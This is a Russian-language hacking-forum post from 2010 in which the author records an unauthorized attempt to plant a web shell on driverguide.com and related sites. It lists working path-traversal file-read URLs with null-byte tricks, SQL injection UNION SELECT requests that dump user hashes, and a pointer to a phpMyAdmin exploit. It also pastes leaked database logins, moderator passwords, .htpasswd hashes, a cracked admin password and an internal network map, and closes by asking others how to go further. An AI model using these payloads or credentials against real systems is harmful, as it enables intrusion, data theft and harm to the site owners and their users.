Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

Параноикам )
  #5  
Старый 08.05.2010, 01:04
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию Параноикам )
короче ситуация такая ...
цель залить шелл на driverguide.com
найденные баги etc...
http://forums.driverguide.com/ форум Булка
http://myupdates.com/static.php?type...screen%2Cstyle
http://myupdates.com/static.php?type.../etc/passwd%00
что то etc/passwd разные показывает хотя файл тот же =\

http://myupdates.com/static.php?type..../index.php%00
http://myupdates.com/static.php?type...tem.inc.php%00
http://myupdates.com/static.php?type...mus.inc.php%00
http://myupdates.com/static.php?type..../etc/hosts%00
http://myupdates.com/static.php?type...ort.inc.php%00
http://myupdates.com/static.php?type...eur.inc.php%00
http://myupdates.com/static.php?type...in.xinc.php%00
http://myupdates.com/static.php?type...tem.inc.php%00
http://myupdates.com/static.php?type.../robots.php%00
http://myupdates.com/static.php?type...nstance.php%00
http://myupdates.com/static.php?type.../httpd.conf%00
http://myupdates.com/static.php?type.../access_log%00
http://myupdates.com/static.php?type..../etc/hosts%00
Path: DocumentRoot /home/httpd/driverguide.com/beta/public
дальше ....
http://myupdates.com/static.php?type.../config.php%00
данные БД но коннекта внешне нема =(
Код:
$config['Database']['dbtype'] = 'mysql';

$config['Database']['dbname'] = 'vb3';

$config['Database']['tableprefix'] = 'vb3_';

$config['Database']['technicalemail'] = '';

$config['Database']['force_sql_mode'] = false;


$config['MasterServer']['servername'] = '192.168.1.194';
$config['MasterServer']['port'] = 3306;

$config['MasterServer']['username'] = 'betav2';
$config['MasterServer']['password'] = 'betav2a';

$config['MasterServer']['usepconnect'] = 0;


$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;
Версия Linux version 2.4.21-60.ELsmp (mockbuild@hs20-bc2-4.build.redhat.com) (gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-59)) #1
Локалка/соседы
192.168.1.244 web6.driverguide.com web6
192.168.1.211 web1.driverguide.com web1
192.168.1.212 web2.driverguide.com web2
192.168.1.214 web3.driverguide.com web3
192.168.1.215 web4.driverguide.com web4
192.168.1.243 web5.driverguide.com web5
127.0.0.1 members-images.driverguide.net
192.168.1.219 eml.driverguide.com
192.168.1.244 members.driverguide.com members
192.168.1.244 forums.driverguide.com forums
192.168.1.244 beta.driverguide.com beta
192.168.1.244 list.driverguide.com list
192.168.1.220 db1.driverguide.com db1
192.168.1.219 email.driverguide.net email
192.168.1.211 web1-internal.driverguide.net
192.168.1.212 web2-internal.driverguide.net

http://members.driverguide.com//internal/phpMyAdmin/
пыхадмин =) phpMyAdmin 2.5.3 сплойт для этой ветке http://milw0rm.com/exploits/309 но хз пока не юзал
http://myupdates.com/internal/admin/
http://myupdates.com/static.php?type=css&files=../internal/admin/.htaccess%00
editor:7vr1es1uwzlqI DES
в Форуме 91к юзверов дамп ваше =)
-added-
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/myupdates.com/www/bcx/myupdates/home/_htpasswd/.htpasswd%00
editor:7vr1es1uwzlqI
http://members.driverguide.com//internal/phpMyAdmin/
Конфиг ПМА http://myupdates.com/static.php?type=css&files=../../../../../../../../../..//home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/config.inc.php%00

Alias /internal/phpMyAdmin/ "/home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/
путь с веба /internal/phpMyAdmin/ но млин
$config['MasterServer']['username'] = 'betav2';
$config['MasterServer']['password'] = 'betav2a';

http://myupdates.com/internal/admin/
вот еще http://myupdates.com/static.php?type=csshttp://myupdates.com/static.php?type=css&files=../../../../../../../../../..///home/httpd/driverguide.com/members/icx/thirdparty/FlashChat_v37/config.php%00
Код:
$database = "driverdb__live";	// MySQL database name
$dbuser = "dev";	// MySQL username
$dbpass = "dbd3v";	// MySQL password
$host = "192.168.1.194";	 // MySQL host name
moderatorPassword = "mod123";	// to login as a moderator
$spyPassword = "spy123";	 // to login as a spy (disabled when using XOOPS)
еще кое что откопал
http://myupdates.com/static.php?type...c/.htpasswd%00
http://intranet.icentric.com/
intranet:f68alIucmxrmU
quincy:B7B2pTzqkrdbQ
опять DES
http://blog.driverguide.com/wp-login.php стоит ВП

Попробовал через сессию но тут как бэ не совсем инклуд а читалка файлов получается, принклудит в лог апача нету резона=\
что можете рекомендовать ? что то в 5 утра башка не варит дальше, хотя 98% данные в руках но ничего не выходит =\
===
короче вот и скуля http://members.driverguide.com/index.php?companyid=-2712+union+select+user(),user_pass+from+driverguid e_blog.wp_users+/*&action=getinfo
Код:
<title>dev@192.168.1.222 ($P$B1SdEpP2uJl/0yIR3M6TryHvTigpEC/) Drivers / Support / Contact Info</title>
http://members.driverguide.com/index.php?companyid=-2712+union+select+username,password+from+user+limi t+1,100000/*&action=getinfo
<title>admin (a1e5555abefe434946e95f0de3fb2787) Drivers / Support / Contact Info</title>

a1e5555abefe434946e95f0de3fb2787 : Shaaolin
quincy:B7B2pTzqkrdbQ:p51s
http://intranet.icentric.com/
http://myupdates.com/internal/admin/
http://members.driverguide.com/internal/phpMyAdmin/
короче никуда не подошел или фильтр по айпи или хз =\
есть идеи ?
P.S Сорри за много букаф )
 
Ответить с цитированием